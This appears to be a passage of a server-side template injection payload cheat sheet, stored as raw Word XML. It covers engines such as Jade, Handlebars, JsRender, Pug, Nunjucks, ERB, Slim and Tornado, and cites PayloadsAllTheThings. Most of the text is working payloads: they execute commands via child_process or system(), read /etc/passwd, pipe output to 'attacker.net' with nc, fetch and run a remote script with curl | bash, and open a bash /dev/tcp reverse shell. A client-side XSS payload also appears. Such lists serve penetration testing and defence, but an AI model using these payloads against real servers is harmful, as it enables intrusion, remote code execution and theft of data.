    </w:p>
    <w:p w14:paraId="18DB06D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PHPlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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HTML_Template_PHPLIB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> (PHP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A2E7F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36" w:history="1">
        <w:proofErr w:type="spellStart"/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HTML_Template_PHPLIB</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink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is the same as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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PHPlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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but ported to Pear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A896A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authors.tpl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FA7CABF" w14:textId="7C3F2BD2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4319F20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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5565EA6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&lt;head&gt;&lt;title&gt;{PAGE_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TITLE}&lt;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/title&gt;&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DF3E2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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C61116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&lt;table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E45F3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&lt;caption&gt;Authors&lt;/caption&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E25F54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&lt;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thead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013EBFD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&lt;tr&gt;&lt;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th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&gt;Name&lt;/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th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&gt;&lt;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th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&gt;Email&lt;/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th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&gt;&lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5367C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&lt;/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thead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1DC1767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&lt;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tfoot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21E9ABF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&lt;tr&gt;&lt;td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colspan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="2"&gt;{NUM_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AUTHORS}&lt;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/td&gt;&lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C77C1B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&lt;/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tfoot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394F0A7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&lt;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tbody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2850EBD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&lt;!--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BEGIN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authorline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--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43747FE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&lt;tr&gt;&lt;td&gt;{AUTHOR_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NAME}&lt;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/td&gt;&lt;td&gt;{AUTHOR_EMAIL}&lt;/td&gt;&lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675CABB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&lt;!--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END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authorline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--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69349F0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&lt;/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tbody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22C528E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&lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BE241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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197A825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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE6CEC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authors.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30974361" w14:textId="598BCD3A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3600C05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&lt;?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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55DF682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//we want to display this author list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AAF46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$authors =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array(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="176F36F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'Christian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Weiske</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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  =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 'cweiske@php.net',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D4F7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Bjoern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Schotte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     =&gt; 'schotte@mayflower.de'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFE73F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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B41F4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5A21B2E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require_once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'HTML/Template/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PHPLIB.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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';</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="59D8166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//create template object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E0AE9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$t =&amp; new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HTML_Template_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PHPLIB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spellStart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dirname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(__FILE__), 'keep');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33966E4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//load file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D12A0E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$t-&gt;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setFile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'authors', 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authors.tpl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');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB4378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//set block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C22B6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$t-&gt;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setBlock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'authors', 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authorline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', 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authorline_ref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');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E08CD1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02B0B2B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//set some variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC3E0C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$t-&gt;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setVar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'NUM_AUTHORS', count($authors));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2893202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$t-&gt;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setVar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'PAGE_TITLE', 'Code authors as of ' . date('Y-m-d')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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2F44DA7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7F7F16A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//display the authors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4995AAD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foreach ($authors as $name =&gt; $email) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC7B26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$t-&gt;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setVar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'AUTHOR_NAME', $name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4112F68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$t-&gt;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setVar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'AUTHOR_EMAIL', $email);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8850D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$t-&gt;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parse(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authorline_ref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', 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authorline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', true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B93147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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5485CFF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2C87CE0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//finish and echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F7F58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echo $t-&gt;finish($t-&gt;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parse(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'OUT', 'authors'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73940A9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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11676A7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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476C642C" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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37" w:anchor="phplib-and-html_template_phplib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https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#phplib-and-html_template_phplib</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="244BB90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Jade (NodeJS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08057771" w14:textId="1D28ACFB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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C3EB3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- var x =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root.process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7B245E0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- x =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x.mainModule.require</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3D38D8D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 x = x('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child_process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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E45C5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=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x.exec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('id |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nc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attacker.net 80')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB76F70" w14:textId="3862B116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473B02D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#{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root.process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.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).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stdout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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE9B6C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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A157F47" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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In Jade section of </w:t>
      </w:r>
      <w:hyperlink r:id="rId38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https://portswigger.net/research/server-side-template-injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="35C0AD39" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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39" w:anchor="jade--codepen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https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3BC222C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patTemplate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> (PHP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BDC3B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0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40" w:history="1">
        <w:proofErr w:type="spellStart"/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patTemplate</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink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non-compiling PHP templating engine, that uses XML tags to divide a document into different </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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parts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="080990D5" w14:textId="07787E22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7205F6F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patTemplate:tmpl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name="page"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DF8B4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This is the main page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEE722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&lt;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patTemplate:tmpl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name="foo"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E938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It contains another template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138E1C2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&lt;/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patTemplate:tmpl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4DD9C40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&lt;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patTemplate:tmpl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name="hello"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36430B0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Hello {NAME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}.&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450BD3E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&lt;/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patTemplate:tmpl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71CC36A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&lt;/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patTemplate:tmpl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42589AC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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C377BEB" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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41" w:anchor="pattemplate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https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#pattemplate</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5799D13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Handlebars (NodeJS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC2BE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Path Traversal (more info </w:t>
      </w:r>
      <w:hyperlink r:id="rId42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here</w:t>
        </w:r>
      </w:hyperlink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).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2E3A74" w14:textId="66F67FC0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0B854AB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curl -X 'POST' -H 'Content-Type: application/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json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 --data-binary $'{\"profile\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":{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"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138EED8C" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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lastRenderedPageBreak/>
        <w:t>= Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3BE2C2" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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${7*7} = ${7*7}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D771095" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC3F161" w14:textId="3CE0B8BE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370FFA7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{{#with "s" as |string|}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B098EF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{{#with "e"}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BE4F6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{{#with split as |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conslist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|}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F8182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{{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this.pop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}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C44B5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{{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this.push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(lookup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string.sub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"constructor")}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8A3BA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{{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this.pop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}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1FCF6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{{#with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string.split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as |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codelist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|}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2564C32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{{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this.pop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}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259F076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{{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this.push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"return require('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child_process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').exec('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whoami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');"}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EB032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{{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this.pop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}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E4029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{{#each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conslist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}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704479D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  {{#with (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string.sub.apply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0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codelist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)}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E038AF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    {{this}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F71FC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  {{/with}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8B5E1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{{/each}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA5DD7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{{/with}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722F00B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{{/with}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103B536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{{/with}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFC92F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{{/with}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9F6FD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6193527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URLencoded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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCF8F9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%7B%7B%23with%20%22s%22%20as%20%7Cstring%7C%7D%7D%0D%0A%20%20%7B%7B%23with%20%22e%22%7D%7D%0D%0A%20%20%20%20%7B%7B%23with%20split%20as%20%7Cconslist%7C%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epush%20%28lookup%20string%2Esub%20%22constructor%22%29%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%23with%20string%2Esplit%20as%20%7Ccodelist%7C%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epush%20%22return%20require%28%27child%5Fprocess%27%29%2Eexec%28%27whoami%27%29%3B%22%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%23each%20conslist%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%23with%20%28string%2Esub%2Eapply%200%20codelist%29%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7B%7Bthis%7D%7D%0D%0A%20%20%20%20</w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%2Feach%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%7B%7B%2Fwith%7D%7D%0D%0A%7B%7B%2Fwith%7D%7D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C5B24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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F55672B" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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43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http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A63D5D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JsRender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> (NodeJS)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11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9289"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E3993" w:rsidRPr="002E3993" w14:paraId="1E6214A6" w14:textId="77777777" w:rsidTr="002E399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100881" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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39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Template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22FD75" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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39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single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
                <w:lang w:eastAsia="en-IN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E3993" w:rsidRPr="002E3993" w14:paraId="0AE0C04E" w14:textId="77777777" w:rsidTr="002E399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BEDF0D" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E39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7FB8C9" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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39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Evaluate and render output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E3993" w:rsidRPr="002E3993" w14:paraId="4C2FF316" w14:textId="77777777" w:rsidTr="002E399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3E162C" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E39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E58BC6" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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39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Evaluate and render HTML encoded output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E3993" w:rsidRPr="002E3993" w14:paraId="76DC4B98" w14:textId="77777777" w:rsidTr="002E399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8D69C2" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E39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1F1E5A" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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39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Comment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E3993" w:rsidRPr="002E3993" w14:paraId="1F9E4AFB" w14:textId="77777777" w:rsidTr="002E399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4CEB72" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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39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DF15D8A" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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39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Allow code (disabled by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16AF3C7A" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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= 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAFDE2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Client Side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E9483F" w14:textId="1512EF93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04854B7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{:%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22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ACDF0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Server Side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF43434" w14:textId="7919FB7B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35839EF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{{:"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pwnd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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toString.constructor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.call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({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').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toString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()")()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1576F93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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1042D03A" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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44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https://appcheck-ng.com/template-injection-jsrender-jsviews/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E3B0B7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PugJs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> (NodeJS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3408F5" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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#{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7*7} = 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69487D56" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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#{function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(){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localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /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tmp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/pwned.txt')}()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFD4062" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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#{function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(){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localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9BB7E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Example </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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server side</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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render</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB23FD" w14:textId="26A6162E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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D0592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var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pugjs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= require('pug'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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00FA235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home =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pugjs.render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injected_page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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172B759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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794BBECE" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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45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https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69E3E81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NUNJUCKS (NodeJS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674AED1A" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{7*7}} = 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4076F43C" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{foo}} = No output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8469F4" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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gramStart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#{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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7*7} = #{7*7}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E18C69" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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console.log(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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1)}} = Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD458A8" w14:textId="3C83E8CC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405A0DE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range.constructor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("return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')")()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D548B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range.constructor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("return global.process.mainModule.require('child_process').execSync('bash -c \"bash -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&gt;&amp; /dev/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tcp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/10.10.14.11/6767 0&gt;&amp;1\"')")()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665270F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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C566B7" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr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46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http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="470234E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ERB (Ruby)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB535A6" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{7*7}} = {{7*7}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D7FB11" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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${7*7} = ${7*7}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC7AC3D" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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&lt;%= 7*7 %&gt; = 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1327A409" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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&lt;%=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foobar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%&gt; = Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CCBB1E" w14:textId="688190A8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3333638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&lt;%= system("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whoami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") %&gt; #Execute code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557E5F8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&lt;%=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Dir.entries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('/') %&gt; #List folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C229E7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&lt;%=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File.open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('/etc/passwd'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).read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%&gt; #Read file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0725594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3EDFA96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&lt;%=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system(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'cat /etc/passwd') %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2571AFE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&lt;%= `ls /` %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157502B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&lt;%=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IO.popen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('ls /').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readlines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()  %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F5CDE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&lt;% require 'open3' %&gt;&lt;% @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a,@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b,@c,@d=Open3.popen3('whoami') %&gt;&lt;%= @b.readline()%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E8928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lastRenderedPageBreak/>
        <w:t>&lt;% require 'open4' %&gt;&lt;% @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a,@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b,@c,@d=Open4.popen4('whoami') %&gt;&lt;%= @c.readline()%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0948F6D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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3274BD" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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47" w:anchor="ruby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https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5DB5604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Slim (Ruby)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123C94E3" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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 7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* 7 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3928884E" w14:textId="441461DA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6301E8E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 %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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x|env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| }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B500A0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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289EA0C4" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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48" w:anchor="ruby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https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="688A455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Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B92CEA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Check out the following page to learn tricks about </w:t>
      </w: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arbitrary command execution bypassing sandboxes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in python:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0FCC44" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E39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9" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="002E3993">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:caps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PAGE</w:t>
        </w:r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Bypass</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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 Python sandboxes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B1C2B7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Tornado (Python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BD2BA3" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{7*7}} = 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3FBBCC" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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${7*7} = ${7*7}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1441B3" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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foobar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}} = Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A295089" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{7*'7'}} = 7777777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E036FD0" w14:textId="1D094CE4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54E5427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{% import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foobar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%} = Error</w:t>
      </w:r>
    </w:p>
